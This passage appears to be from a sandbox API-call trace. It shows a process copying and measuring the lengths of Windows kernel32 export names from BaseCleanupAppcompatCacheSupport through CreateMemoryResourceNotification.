returned="BaseCleanupAppcompatCacheSupport" [0078.491] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.491] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.491] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.491] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.492] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.492] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.492] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.492] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.492] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.492] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.492] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.492] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.492] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.492] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.492] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.492] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.492] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.492] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.492] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.492] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.492] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.492] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.492] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.493] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.493] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.493] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.493] lstrlenA (lpString="BEEP") returned 4 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.493] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.493] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.493] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.493] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.493] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.493] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.493] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.493] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.493] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.493] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.493] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.493] lstrlenA (lpString="CANCELIO") returned 8 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.493] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.493] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.493] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.494] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.494] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.494] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.494] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.494] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.494] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.494] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.494] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.494] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.494] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.494] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.494] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.494] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.494] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.494] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.494] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.494] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.494] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.494] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.495] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.495] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.495] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.495] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.495] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.495] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.495] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.495] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.495] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.495] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.495] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.495] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.495] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.495] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.495] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.495] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.495] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.506] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.506] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.506] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.506] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.506] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.506] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.506] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.506] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.506] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.506] lstrlenA (lpString="COPYFILEA") returned 9 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.506] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.506] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.506] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.506] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.507] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.507] lstrlenA (lpString="COPYFILEW") returned 9 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.507] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.507] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.507] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.507] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.507] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.507] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.507] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.507] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.507] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.507] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.507] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.507] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.507] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.507] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.507] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.507] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.507] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.507] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.508] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.508] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.508] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.508] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.508] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.508] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.508] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.508] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.508] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.508] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.508] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.508] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.508] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.508] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.508] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.508] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.508] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.508] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.508] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.509] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.509] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") 